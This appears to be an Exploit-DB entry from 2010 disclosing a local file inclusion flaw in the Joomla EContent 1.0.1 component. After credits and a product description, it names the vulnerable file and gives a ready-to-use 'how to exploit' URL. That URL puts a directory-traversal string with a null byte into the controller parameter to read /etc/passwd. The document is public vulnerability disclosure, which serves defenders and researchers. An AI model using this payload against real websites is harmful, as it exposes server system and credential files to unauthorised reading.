Joomla! Component EContent - Local File Inclusion

EDB-ID:

11996

CVE:

N/A




Platform:

PHP

Date:

2010-04-01


---------------------------------------------------------------------------------
Joomla Component EContent Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: EContent
version		: 1.0.1
Developer	: E-Content
website		: http://www.econtentsite.com/
License		: GPL            type  : Non-Commercial
Date Added	: 24 March 2010
Download	: http://www.econtentsite.com/



Description     :

If you are looking a way to add new/fresh content to your Joomla website,
without having to write a new article everyday, then E-Content Joomla
Component is the solution for you!

As we know articles is very important for business, especially for Internet
Marketing Business. You need to continually write unique and quality articles
to keep the attention of visitors and search engines.

E-Content allows you to automatically collect RSS feed, HTML page content items
and have each item inserted as an Joomla article in the section and category
you define. The content of the article will vary based on the specific page you
select.


--------------
file error	: components/com_econtent/econtent.php

how to exploit

http://127.0.0.1/index.php?option=com_econtent&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++